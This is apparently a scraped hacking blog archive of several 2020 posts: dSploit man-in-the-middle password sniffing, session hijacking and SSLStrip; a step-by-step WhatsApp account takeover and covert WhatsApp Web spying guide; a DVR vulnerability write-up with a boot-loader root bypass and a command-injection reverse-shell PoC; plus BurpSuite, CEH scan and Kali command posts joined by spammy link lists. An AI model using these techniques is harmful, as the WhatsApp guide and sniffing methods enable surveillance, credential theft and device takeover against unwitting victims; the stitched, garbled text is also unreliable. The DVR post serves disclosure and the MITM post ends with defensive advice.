Sunday, 26 April 2020



After playing with the applications installed on the Pwn Pad, I found that the most important application (at least for me) was missing from the pre-installed apps. Namely, DSploit. Although DSploit has tons of features, I really liked the multiprotocol password sniffing (same as dsniff) and the session hijacking functionality.

The DSploit APK in the Play Store was not working for me, but the latest nightly on worked like a charm.

Most features require that you and your target uses the same WiFi network, and that's it. It can be Open, WEP, WPA/WPA2 Personal. On all of these networks, DSploit will sniff the passwords - because of the active attacks. E.g. a lot of email clients still use IMAP with clear text passwords, or some webmails, etc. 

First, DSploit lists the AP and the known devices on the network. In this case, I chose one victim client.

In the following submenu, there are tons of options, but the best features are in the MITM section. 

Stealthiness warning: in some cases, I received the following popup on the victim Windows:

This is what we have under the MITM submenu:

Password sniffing

For example, let's start with the Password Sniffer. It is the same as EvilAP and DSniff in my previous post. With the same results for the popular Hungarian webmail with the default secure login checkbox turned off. Don't forget, this is not an Open WiFi network, but one with WPA2 protection!

Session hijack

Now let's assume that the victim is very security-aware and he checks the secure login checkbox. Another cause can be that the victim already logged in, long before we started to attack. The session hijacking function is similar to the Firesheep tool, but it works with every website where the session cookies are sent in clear text, and there is no need for any additional support.

In a session hijacking attack (also called "sidejacking"), after the victim browser sends the authentication cookies in clear text, DSploit copies these cookies into its own browser, and opens the website with the same cookies, which results in successful login most of the time. Let's see session hijacking in action!

Here, we can see that the session cookies have been sniffed from the air:

Let's select that session, and be amazed that we logged into the user's webmail session.

Redirect traffic

This feature can be used both for fun or profit. For fun, you can redirect all the victim traffic to For-profit, you can redirect your victim to phishing pages.

Replace images, videos

I think this is just for fun here. Endless Rick Rolling possibilities.

Script injection

This is mostly for profit. client-side injection, drive-by-exploits, endless possibilities.

Custom filter

If you are familiar with ettercap, this has similar functionalities (but dumber), with string or regex replacements. E.g. you can replace the news, stock prices, which pizza the victim ordered, etc. If you know more fun stuff here, please leave a comment (only HTTP scenario - e.g. attacking Facebook won't work).

Additional fun (not in DSploit) - SSLStrip 

From the MITM section of DSploit, I really miss the SSLStrip functionality. Luckily, it is built into the Pwn Pad. With the help of SSLStrip, we can remove the references to HTTPS links in the clear text HTTP traffic, and replace those with HTTP. So even if the user checks the secure login checkbox at, the password will be sent in clear text - thus it can be sniffed with DSniff.

HTML source on the client-side without SSLstrip:

HTML source on the client-side with SSL strip:

With EvilAP, SSLStrip, and DSniff, the password can be stolen. No hacking skillz needed.

Lessons learned here

If you are a website operator where you allow your users to login, always:
  1. Use HTTPS with a trusted certificate, and redirect all unencrypted traffic to HTTPS ASAP
  2. Mark the session cookies with the secure flag
  3. Use HSTS to prevent SSLStrip attacks
If you are a user:
  1. Don't trust sites with your confidential data if the above points are not fixed. Choose a more secure alternative
  2. Use HTTPS everywhere plugin
  3. For improved security, use VPN
Because hacking has never been so easy before.
And last but not least, if you like the DSploit project, don't forget to donate them!
Related links

Saturday, 25 April 2020

How To Hack Any Whatsapp Account In 2020

The article will also be broken down into different subtopics and subcategories. This to make it easy for those who are just interested in skimming through the article to pick the part of WhatsApp hack they are most interested in. Just incase you don't have enough time to go through the entire article.

Search queries like these are a common place; Can WhatsApp be hacked? Can you read WhatsApp messages? How safe is the most popular trade fair in the world? This article gives you all the solution you need to hack any WhatsApp account, as well as how to protect yourself from a WhatsApp hack attack.

Although the messenger is now on an end-to-end encryption, WhatsApp is still not totally safe from espionage. WhatsApp chats and messages can still be accessed and read remotely, and old &deleted WhatsApp chats and messages retrieved.

WhatsApp Spy: Hack WhatsApp Chats and Messages

A very simple solution is to use a software that can hack WhatsApp remotely. All manufacturers offer to read the WhatsApp messages an extra web portal. In addition to the Whatsapp messages but can also spy on other messengers. So you can also have access to social media accounts.

The software may only be installed on a smartphone. If the user of the smartphone has been informed about the installation and effects.

WhatsApp Hacker: 3 Steps to Hack WhatsApp in 2020

You can hack Whatsapp using a second cell phone. No extra SIM card is necessary for this. The guide also works with a tablet. With this method, the other phone only needs to clone WhatsApp messages is internet connection.

The trick to hack Whatsapp successfully is not a software bug. It's the way WhatsApp has developed the setup wizard. Since there are no user accounts with passwords and you log in via the mobile number, here lies the vulnerability. But you can also protect yourself from the Whatsapp hack.

Hack WhatsApp Chat with the Best WhatsApp Hacking Tool

To read Whatsapp messages, the mobile phone number of the target must be known. The cell phone can remain locked. There is no need to install software to hack and read Whatsapp messages. Even with the PIN or fingerprint, the Whatsapp account can be hacked.

STEP 1: Create a New WhatsApp Account

To hack an account from Whatsapp, the app from the App Store must be installed on the second cell phone. After the installation of Whatsapp, target's phone number is entered. A confirmation request must be waited until access to the smartphone of the victim exists.

STEP 2: WhatsApp Account Confirmation

The confirmation of the Whatsapp account is the actual security risk of the messenger. Whatsapp usually confirms the registration via SMS. Occasionally the confirmation will also be sent by automated phone call via a phone call.

Calls and text messages can be read and taken by anyone even when the screen is locked. So that the WhatsApp hack does not stand out, the SMS must be removed from the start screen by swiping.

STEP 3: Enter Confirmation

The stolen verification PIN is now entered on the second smartphone. As a result, the WhatsApp account has been taken over by you. You can read the WhatsApp messages, which respond to this mobile phone number.

The downside to this trick is that the victim immediately notices the Whatsapp hack as soon as Whatsapp is opened. If the victim goes through the sign-in process again. The attacker loses access to the messages and no Whatsapp messages can be read.

How to Hack Someone's WhatsApp in 2020

A good way to hack a WhatsApp account is to hack whatsapp online. Here you can read WhatsApp messages via a browser and also write. The target user can continue to use his cell phone (works for iOS, Android phone etc) and does not notice the WhatsApp hack.

STEP 1: Access the Cell Phone

In order to be able to read WhatsApp messages by installing software. Access to the unlocked smartphone is required for a short time. In addition, cell phone, a computer or laptop is necessary. On this the Whatsapp messages will be read later.

STEP 2: Access WhatsApp Web

If you have access to the unlocked smartphone, Whatsapp must be started there. The Whatsapp settings include Whatsapp Web . If this is selected, Whatsapp opens a QR code scanner with the hint to open WhatsApp Web in the browser.

If the QR code is scanned in the browser with the smartphone. There is a permanent connection and Whatsapp messages can be read. If you want to hack Whatsapp in this way. You have full access to all incoming messages and you can even write messages yourself.

STEP 3: Read WhatsApp Messages

The target usually sees this Whatsapp hack only when the settings are invoked to Whatsapp Web in the app. Whatsapp messages can be read via the browser. Regardless of whether the smartphone is on home Wi-Fi or on the move. You can also hack group chats admin by just having any of the contact details.

WhatsApp Hack: How to Hack any WhatsApp account

Which is the most popular messaging app globally? Of course, you can use different apps from Android or iOS to send and receive messages. But Whatsapp remains everyone's favorite globally!

Whatsapp is one of the popular apps in the world. There are more than 2 billion active users on Whatsapp, messaging daily with the app. Why do people love WhatsApp? Whatsapp is very convenient and easy to use.

Other messaging apps like Facebook Messenger, still needs a special account to sign up for this app. If you change a new app, you'll need to add another account. This can be stressful, as you have to remember a lot of new passwords and usernames.


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Friday, 24 April 2020

Swann Song - DVR Insecurity

"Swan song" is a metaphorical phrase for a final gesture, effort, or performance given just before death or retirement. This post serves as the "swan song" for a whole slew of DVR security systems. With that being said, I will refer to the lyrical master MC Hammer, lets turn this mutha' out.

I recently had a chance to get my hands on a 4 channel DVR system system sold under a handful of company banners (4/8/16 channels) - Swann, Lorex, Night Owl, Zmodo, URMET, kguard security, etc. A few device model numbers are - DVR04B, DVR08B, DVR-16CIF, DVR16B
After firing up the device and putting it on the network I noticed that it was running a telnet server, unfortunately the device does not appear to come configured with an easy/weak login :(. Time to open it up and see whats going on :)

After opening the device up something grabbed my attention right away....

The highlighted header looked like a pretty good possibility for a serial port, time to break out the multi-meter and check. After a couple power cycles, the header was indeed a serial port :)

After hooking up my usb to serial breakout board to the device serial port and guessing at the following serial settings: 115200 8-N-1 , I was stuck looking at a login prompt without a working login or password.

Lucky for me the device startup can be reconfigured using the u-boot environment. The environment variable "bootargs" can be adjusted to boot the linux system into single user mode by appending "single" to the end of the existing settings:
setenv bootargs mem=68M console=ttyAMA0,115200 root=1f01 rootfstype=jffs2 mtdparts=physmap-flash.0:4M(boot),12M(rootfs),14M(app),2M(para) busclk=220000000 single

This change to the bootargs variable is only temporary at this point, if we were to power cycle the device the change would be lost. It is possible to write these changes to the device, but in this case we only want to boot into single user mode once. To boot the device you need to tell the boot loader where the kernel exists in memory, this value can be found in the default environment variable "bootdcmd".

Once the device is booted up in single user mode, the root password can be reset and the device can be rebooted. Telnet now works, but what fun is that when these devices don't normally expose telnet to the internet :). Now for the real fun...looking at the device the default configuration is setup to auto-magically use the power of the dark lord satan (uPnP) to map a few ports on your router (if it supports uPnP). One of the ports that it will expose is for the web (activeX) application and the other is the actual comms channel the device uses (port 9000). The first item I looked at was the web application that is used to view the video streams remotely and configure the device. The first thing that I found with this lovely device is that the comms channel (9000) did not appear to do any authentication on requests made to it...Strike 1. I imagine the activeX application that is used to connect to the device could be patched to just skip the login screen, but that seems like a lot of work, especially when there are much easier ways in. The next thing I saw was a bit shocking...when you access the application user accounts page the device sends the application all the information about the accounts stored on the device. This includes the login and password. In clear text. Strike 2. I created a small PoC in python that will pull the password from a vulnerable device:
[+]Username: admin
[+]Password: 123456
Script can be found here.

After owning the device at the "application" level, I figured it was time to go deeper.

Port 9000 is run by a binary named 'raysharpdvr'. I pulled the binary off the device and started going through it looking for interesting stuff. First thing I noticed was the device was using the "system" call to carry out some actions, after chasing down these calls and not seeing much, the following popped up:

"sprintf" with user input into a "system", that'll do it. Couple problems to overcome with this. First in order to use this vector for command injection you must configure the device to use "ppp" - this will cause the device to go offline and we will not be able to interact with it further :(. We can get around this issue by injecting a call to the dhcp client appliction ("udhcpc") - this will cause the device to use dhcp to get its network information bypassing the previous "ppp" config. The other issue is once we have reconfigured the device to run our command, it needs to be restarted before it will execute (its part of the init scripts). The application does not actually provide a way to reboot the device using the web interface, there is a section that says 'reboot', but when it is triggered nothing happens and some debugging information displayed in the serial console saying the functionality is not implemented. Lucky for us there are plenty of overflow bugs in this device that will lead to a crash :). The device has a watchdog that polls the system to check if the "raysharpdvr" application is running and if it does not see it, it initiates a system reboot - very helpful. With those two issues out of the way the only thing left is HOW to talk to our remote root shell that is waiting for us....luckily the device ships with netcat built into busybox, -e flag and all :)
Usage: <target> <connectback host> <connectback port>
$ python 9999
[*]Sending Stage 1
[*]Sending Stage 2
[*]Rebooting the server with crash....
Ncat: Version 5.21 ( )
Ncat: Listening on
Strike 3, get this weak shit off my network. The script can be found here. The script relies on the web application running on port 80, this is not always the case so you may need to adjust the script to fix if your device listens on another port. It is also worth noting that it may take a few minutes for the device to reboot and connect back to you.
Unfortunately the web server that runs on this device does not behave correctly (no response headers) so I do not believe finding these online is as easy as searching shodan, however it is possible to fingerprint vulnerable devices by looking for hosts with port 9000 open.

tl;dr; A whole slew of security dvr devices are vulnerable to an unauthenticated login disclosure and unauthenticated command injection.
Related links
  1. Wargames Hacking
  2. Aprender Hacking Etico
  3. Wordpress Hacking
  4. Libro Hacker
  5. Cosas De Hackers

Thursday, 23 April 2020

BurpSuite Introduction & Installation

What is BurpSuite?
Burp Suite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps you identify vulnerabilities and verify attack vectors that are affecting web applications. Because of its popularity and breadth as well as depth of features, we have created this useful page as a collection of Burp Suite knowledge and information.

In its simplest form, Burp Suite can be classified as an Interception Proxy. While browsing their target application, a penetration tester can configure their internet browser to route traffic through the Burp Suite proxy server. Burp Suite then acts as a (sort of) Man In The Middle by capturing and analyzing each request to and from the target web application so that they can be analyzed.

Everyone has their favorite security tools, but when it comes to mobile and web applications I've always found myself looking BurpSuite . It always seems to have everything I need and for folks just getting started with web application testing it can be a challenge putting all of the pieces together. I'm just going to go through the installation to paint a good picture of how to get it up quickly.

BurpSuite is freely available with everything you need to get started and when you're ready to cut the leash, the professional version has some handy tools that can make the whole process a little bit easier. I'll also go through how to install FoxyProxy which makes it much easier to change your proxy setup, but we'll get into that a little later.

Requirements and assumptions:

Mozilla Firefox 3.1 or Later Knowledge of Firefox Add-ons and installation The Java Runtime Environment installed

Download BurpSuite from make a note of where you save it.

on for Firefox from

If this is your first time running the JAR file, it may take a minute or two to load, so be patient and wait.

Video for setup and installation.

You need to install compatible version of java , So that you can run BurpSuite.

Related links

  1. Hacking Windows: Ataques A Sistemas Y Redes Microsoft
  2. Hacking Growth
  3. Que Es Growth Hacking
  4. Programas Para Hackear
  5. Hacking Mac
  6. Un Hacker
  7. Hacking Code
  8. Python Hacking
  9. Hacking Team
  10. Hacker Profesional
  11. Hacking Roblox

SANS SEC575 Mentor Class

Hi everyone,

Great news! I will be mentoring SANS 575: Mobile Device Security and Ethical Hacking in Luxembourg on Thursday evenings 18:00-20:00, starting from January 15, 2015.

Mentor classes are special, 10 week-format SANS classroom sessions that give the students time to absorb and master the same material with the guidance of a trained security professional.

Students receive all the same course materials used at SANS conferences and study at a more leisurely pace, so students will have:
  • Hardcopy set of SANS course books
  • Mentor Program study materials
  • Weekly Mentor led sessions
Prior to the weekly Mentor-led classroom sessions, students study SANS course material at their own pace. Each week, students meet with other professionals in their hometown area and the SANS mentor, who leads topical discussions pointing out the most salient features of the weekly material studied, provides hands-on demonstrations, and answer questions. The Mentor's goal is to help student's grasp the more difficult material, master the exercises, demonstrate the tools and prepare for GIAC certification.

On SANS SEC575, we will learn about mobile device infrastructures, policies and management, we will see the security models of the different platforms, like the data storage and file system architecture. We will also see how to unlock, root and jailbreak mobile devices in order to prepare them for data extraction and further testing. In the second half of the course, we will learn how to perform static and dynamic mobile application analysis, the usage of automated application analysis tools and how to manipulate application behavior. Last but not least, we will see how to perform mobile penetration testing that includes fingerprinting mobile devices, wireless network probing and scanning, attacking wireless infrastructures, using network manipulation attacks and attacks against mobile applications and back-end applications.

For more info, here is the link for the class:
My Mentor bio: 

Information on the class, special discounts and applying for the class: szili_(dot)_david_(at)_hotmail_(dot)_com

Additional info can be also found at:
Some special price is also available for this course. A few examples:

Best regards,

Such low price. Very SANS. Much learning. Wow!

Related links

  1. Hacking Background
  2. Hacking Madrid
  3. Que Hay Que Estudiar Para Ser Hacker
  4. Wifi Hacking
  5. Hacking Desde Cero
  6. Curso De Hacking Etico Gratis
  7. Hacking Time
  8. Capture The Flag Hacking
  9. Definicion De Hacker
  10. Curso Seguridad Informatica
  11. Hacking Udemy

CEH: Gathering Network And Host Information, Types Of Scan

In Hacking the main focus is over gathering the information about victim or victim's machine. Which will help to find out which type of exploit will works according to the given circumstances. Gathering the network and host information means to find out by which network, the which victim's machine is connected and communicating over the network. Moreover, scanning is also performed for gathering information about open and closed ports. After that they'll able to find the vulnerabilities in the target system and try to get access to the system.

Types Of Scan

As a CEH you should know the scan types and uses:


SYN scan doesn't complete the TCP three way handshake that is why it is known as a half-open scan. An attacker send a SYN packet to the victim machine if SYN/ACK packet is received back to attacker, then it clarify that the port is listening due to the acknowledgment by the victim that it has completed the connection. While if the attacker is received the RST/ACK packet then it assumed that the port is closed or open.


XMAS scan works only on target system that has the RFC 793 development of TCP/IP and it doesn't works against any version of windows.
XMAS scan send a packet with by setting up the FIN, URG and PSH flags of the TCP header. The function of this scan is if the port is active there will be no response but if the port is closed the target responds with a RST/ACK packet.


A FIN scan send a packet by setting up only the FIN flag of the TCP. This scan is similar to XMAS scan. FIN scan receives no response if the port is active while if the port is closed it receives the RST/ACK packet.


NULL scan is also similar to the XMAS scan. But the only difference is that it sends a packet without setting up the any flag of TCP header. NULL scan receives no response if the port is open but if the port is closed it receives the RST/ACK packet.


It is just like spoofing an IP address by sending a SYN packet to the victim's machine to find out which services are available over the system. This scan is completed with the help of another system called as "Zombie" (that is not receiving or transmitting any information).

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Wednesday, 22 April 2020

Learn A-Z Kali_Linux Commands For Beginerrs


All commands (A-Z) for Kali Linux here:
apropos Search Help manual pages (man -k)
apt-get Search for and install software packages (Debian/Ubuntu)
aptitude Search for and install software packages (Debian/Ubuntu)
aspell Spell Checker
awk Find and Replace text, database sort/validate/index
basename Strip directory and suffix from filenames
bash GNU Bourne-Again SHell
bc Arbitrary precision calculator language
bg Send to background
break Exit from a loop •
builtin Run a shell builtin
bzip2 Compress or decompress named file(s)
cal Display a calendar
case Conditionally perform a command
cat Concatenate and print (display) the content of files
cd Change Directory
cfdisk Partition table manipulator for Linux
chgrp Change group ownership
chmod Change access permissions
chown Change file owner and group
chroot Run a command with a different root directory
chkconfig System services (runlevel)
cksum Print CRC checksum and byte counts
clear Clear terminal screen
cmp Compare two files
comm Compare two sorted files line by line
command Run a command – ignoring shell functions •
continue Resume the next iteration of a loop •
cp Copy one or more files to another location
cron Daemon to execute scheduled commands
crontab Schedule a command to run at a later time
csplit Split a file into context-determined pieces
cut Divide a file into several parts
date Display or change the date & time
dc Desk Calculator
dd Convert and copy a file, write disk headers, boot records
ddrescue Data recovery tool
declare Declare variables and give them attributes •
df Display free disk space
diff Display the differences between two files
diff3 Show differences among three files
dig DNS lookup
dir Briefly list directory contents
dircolors Colour setup for `ls'
dirname Convert a full pathname to just a path
dirs Display list of remembered directories
dmesg Print kernel & driver messages
du Estimate file space usage
echo Display message on screen •
egrep Search file(s) for lines that match an extended expression
eject Eject removable media
enable Enable and disable builtin shell commands •
env Environment variables
ethtool Ethernet card settings
eval Evaluate several commands/arguments
exec Execute a command
exit Exit the shell
expect Automate arbitrary applications accessed over a terminal
expand Convert tabs to spaces
export Set an environment variable
expr Evaluate expressions
false Do nothing, unsuccessfully
fdformat Low-level format a floppy disk
fdisk Partition table manipulator for Linux
fg Send job to foreground
fgrep Search file(s) for lines that match a fixed string
file Determine file type
find Search for files that meet a desired criteria
fmt Reformat paragraph text
fold Wrap text to fit a specified width.
for Expand words, and execute commands
format Format disks or tapes
free Display memory usage
fsck File system consistency check and repair
ftp File Transfer Protocol
function Define Function Macros
fuser Identify/kill the process that is accessing a file
gawk Find and Replace text within file(s)
getopts Parse positional parameters
grep Search file(s) for lines that match a given pattern
groupadd Add a user security group
groupdel Delete a group
groupmod Modify a group
groups Print group names a user is in
gzip Compress or decompress named file(s)
hash Remember the full pathname of a name argument
head Output the first part of file(s)
help Display help for a built-in command •
history Command History
hostname Print or set system name
iconv Convert the character set of a file
id Print user and group id's
if Conditionally perform a command
ifconfig Configure a network interface
ifdown Stop a network interface
ifup Start a network interface up
import Capture an X server screen and save the image to file
install Copy files and set attributes
jobs List active jobs •
join Join lines on a common field
kill Stop a process from running
killall Kill processes by name
less Display output one screen at a time
let Perform arithmetic on shell variables •
ln Create a symbolic link to a file
local Create variables •
locate Find files
logname Print current login name
logout Exit a login shell •
look Display lines beginning with a given string
lpc Line printer control program
lpr Off line print
lprint Print a file
lprintd Abort a print job
lprintq List the print queue
lprm Remove jobs from the print queue
ls List information about file(s)
lsof List open files
make Recompile a group of programs
man Help manual
mkdir Create new folder(s)
mkfifo Make FIFOs (named pipes)
mkisofs Create an hybrid ISO9660/JOLIET/HFS filesystem
mknod Make block or character special files
more Display output one screen at a time
mount Mount a file system
mtools Manipulate MS-DOS files
mtr Network diagnostics (traceroute/ping)
mv Move or rename files or directories
mmv Mass Move and rename (files)
netstat Networking information
nice Set the priority of a command or job
nl Number lines and write files
nohup Run a command immune to hangups
notify-send Send desktop notifications
nslookup Query Internet name servers interactively
open Open a file in its default application
op Operator access
passwd Modify a user password
paste Merge lines of files
pathchk Check file name portability
ping Test a network connection
pkill Stop processes from running
popd Restore the previous value of the current directory
pr Prepare files for printing
printcap Printer capability database
printenv Print environment variables
printf Format and print data •
ps Process status
pushd Save and then change the current directory
pwd Print Working Directory
quota Display disk usage and limits
quotacheck Scan a file system for disk usage
quotactl Set disk quotas
ram ram disk device
rcp Copy files between two machines
read Read a line from standard input •
readarray Read from stdin into an array variable •
readonly Mark variables/functions as readonly
reboot Reboot the system
rename Rename files
renice Alter priority of running processes
remsync Synchronize remote files via email
return Exit a shell function
rev Reverse lines of a file
rm Remove files
rmdir Remove folder(s)
rsync Remote file copy (Synchronize file trees)
screen Multiplex terminal, run remote shells via ssh
scp Secure copy (remote file copy)
sdiff Merge two files interactively
sed Stream Editor
select Accept keyboard input
seq Print numeric sequences
set Manipulate shell variables and functions
sftp Secure File Transfer Program
shift Shift positional parameters
shopt Shell Options
shutdown Shutdown or restart linux
sleep Delay for a specified time
slocate Find files
sort Sort text files
source Run commands from a file `.'
split Split a file into fixed-size pieces
ssh Secure Shell client (remote login program)
strace Trace system calls and signals
su Substitute user identity
sudo Execute a command as another user
sum Print a checksum for a file
suspend Suspend execution of this shell •
symlink Make a new name for a file
sync Synchronize data on disk with memory
tail Output the last part of file
tar Tape ARchiver
tee Redirect output to multiple files
test Evaluate a conditional expression
time Measure Program running time
times User and system times
touch Change file timestamps
top List processes running on the system
traceroute Trace Route to Host
trap Run a command when a signal is set(bourne)
tr Translate, squeeze, and/or delete characters
true Do nothing, successfully
tsort Topological sort
tty Print filename of terminal on stdin
type Describe a command •
ulimit Limit user resources •
umask Users file creation mask
umount Unmount a device
unalias Remove an alias •
uname Print system information
unexpand Convert spaces to tabs
uniq Uniquify files
units Convert units from one scale to another
unset Remove variable or function names
unshar Unpack shell archive scripts
until Execute commands (until error)
uptime Show uptime
useradd Create new user account
userdel Delete a user account
usermod Modify user account
users List users currently logged in
uuencode Encode a binary file
uudecode Decode a file created by uuencode
v Verbosely list directory contents (`ls -l -b')
vdir Verbosely list directory contents (`ls -l -b')
vi Text Editor
vmstat Report virtual memory statistics
wait Wait for a process to complete •
watch Execute/display a program periodically
wc Print byte, word, and line counts
whereis Search the user's $path, man pages and source files for a program
which Search the user's $path for a program file
while Execute commands
who Print all usernames currently logged in
whoami Print the current user id and name (`id -un')
wget Retrieve web pages or files via HTTP, HTTPS or FTP
write Send a message to another user
xargs Execute utility, passing constructed argument list(s)
xdg-open Open a file or URL in the user's preferred application.
yes Print a string until interrupted
. Run a command script in the current shell
!! Run the last command again
More info